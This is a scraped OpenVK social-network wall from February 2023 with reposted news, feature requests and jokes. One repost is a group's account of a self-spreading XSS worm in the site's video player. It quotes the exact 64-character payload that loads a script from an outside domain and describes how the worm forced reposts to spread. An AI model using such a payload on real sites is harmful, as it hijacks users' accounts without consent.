Нестеренко Егор написал 10 февраля 2023 в 07:00 (ред.), закреплено Связи с тем, что у меня никак не получается поставить двухфакторную аутентификацию на страницу, я пишу это сообщение заранее, чтобы ко мне никак вопросов не было: если что-то такое у меня на странице/группе появится — это НЕ Я. Мне таким идиотизмом заниматься желания нет. Меня либо взломали, либо что-то ещё. Комментарии  |  Поделиться 2

Нестеренко Егор написал 14 февраля 2023 в 11:29 Daniel Myslivets опубликовали 14 февраля 2023 в 09:51 14 февраля 1946 года научному миру был продемонстрирован первый реально работающий электронный компьютер ENIAC I (Electrical Numerical Integrator And Calculator) В последствии этот день стал неофициально праздноваться как "День компьютерщика" Автор: Даниил Мысливец Комментарии  |  Поделиться 1

Нестеренко Егор написал 13 февраля 2023 в 09:40 DELETED написал 13 февраля 2023 в 09:37 Вова блять, сделай игнор-лист для "Все новости". Комментарии  |  Поделиться 1

Нестеренко Егор написал 13 февраля 2023 в 09:17 летс ду репост репоста Комментарии  |  Поделиться 3

Нестеренко Егор написал 13 февраля 2023 в 05:49 Хотя бы в этом ВКонтакте я могу такие новости читать и не сесть за это на бутылку. ? Быт российского режима опубликовали 12 февраля 2023 в 18:23 Жительницу Твери оштрафовали на 30 тысяч рублей за возложение цветов в знак памяти о трагедии в Днепре Как пишет ASTRA, 33-летней Елене вменили «дискредитацию» вооруженных сил Российской Федерации. По данным издания, с доносом в полицию позвонил исполняющий обязанности главы Центрального района Твери. 14 января 2023 года российские войска ударили ракетой по жилому дому в Днепре. В результате атаки погибли 46 человек. Во многих городах России люди начали приносить цветы к памятникам жертвам политических репрессий или к мемориалам украинским деятелям культуры в знак памяти о трагедии в Днепре. Комментарии (11)  |  Поделиться 4

Нестеренко Егор написал 11 февраля 2023 в 08:49 Чтобы при закреплении ссылки в посте еще и появлялось кликабельное изображение, из которого уже можно было бы видос посмотреть. А то, чисто по ссылке переходить иногда бывает неудобно, да и не очень красиво публикации выглядят. Комментарии  |  Поделиться 2

Нестеренко Егор написал 10 февраля 2023 в 12:20 ? DELETED написал 10 февраля 2023 в 11:36 Ужасы нашего Городка. Описание, кстати, не на 100 процентов верное. Дело в том, что я был свидетелем всего этого анального карнавала, однако я спокойно посещал новости и не словил данный эффект. Багосы OpenVK опубликовали 10 февраля 2023 в 08:11 Доброго времени суток, на связи команда Багосов! Этой ночью нами была найдена критическая уязвимость в нововведённом видео-плеере. Уязвимость заключалась в отсутствии фильтрации названия видео, после его редактирования и позволяла она вставить туда любой пользовательский javascript код, чем мы и решили воспользоваться! Всё бы хорошо, но почти сразу мы наткнулись на проблему - лимит ровно в 64 символа. Нам необходимо было построить цепочку эксплоитов, которая сама себя встроит в html код страницы и сможет распространяться самостоятельно, как червь(Хотя мы назвали это гидрой, расскажем почему чуть позже), Спустя несколько часов перебора вариантов, мы максимально сильно ужали точку входа в наш скрипт(из-за такого подхода ломался интерфейс плеера, так как нам приходилось убирать некоторые кусочки html кода для вмещения в лимит символов). Не будем тянуть, представляю вам магнум опус этого взлома, код загружающий внешний скрипт на страницу, длинной ровно в 64 символа: <audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')" Скрипт создавал на в html коде страницы тег script, ссылающийся на этот код: pastebin.com/maewTdPT Этот код работает достаточно просто, он берёт хэш прямо с кода страницы(он нужен для работы бекенда) и с ним в качестве аргумента делает репост записи с видео, у которого в названии та самая строчка из 64 символов. Ну и теперь следите за руками, сейчас я вам покажу секрет фокуса! Каждый человек, заходя в новости, прогружал плеер с вредоносным кодом(обычно даже не один), что вызывало цепочку скриптов на странице и как следствие, делала репосты на стену пользователя, которые в последствии попадались другим пользователям. Самое смешное, если у пользователя на собственной стене было хотя-бы два репоста, то избавиться от них было просто невозможно, удаление одного поста вызывало перезагрузку страницы и повторное исполнение цепочки скриптов, потому мы и назвали её гидрой, потому что убить её можно было только уничтожив все репосты разом, что конечно подсилу только админам. Хотим отметить скорую реакцию, достаточно ранним утром, у администрации сайта. Это приятно и вызывает доверие! Спасибо!! Unnamed Video.ogv Комментарии  |  Поделиться 2

Нестеренко Егор написал 10 февраля 2023 в 11:27 Знаем мы... За что его... КХМ... В И Л К А опубликовали 10 февраля 2023 в 10:10 Сергей Фургал приговорен к 22 годам заключения Люберецкий суд вместе с присяжными признал виновным экс-губернатора Хабаровского края по делу об организации двух убийств и одного покушения. По версии следствия, Фургал вместе с сообщниками организовал покушение на бизнесмена Александра Смольского и убийство предпринимателей Евгения Зори и Олега Булатова в 2004–2005 годах. Народное жюри 2 февраля признало Фургала виновным в организации двух убийств и одного покушения, а также в обороте оружия, однако по данному эпизоду вышел срок давности. Присяжные решили, что снисхождения он не заслуживает. Комментарии  |  Поделиться 1

Нестеренко Егор написал 10 февраля 2023 в 07:04 Ахренеть, конечно, дыра в безопасности была... Вячеслав Петров написал 10 февраля 2023 в 06:55 ура, xss уязвимость пофиксили повезло тем у кого адблок Комментарии  |  Поделиться 3

Нестеренко Егор написал 9 февраля 2023 в 19:09 Дмитрий написал 9 февраля 2023 в 18:32 Unnamed Video.ogv Комментарии  |  Поделиться 2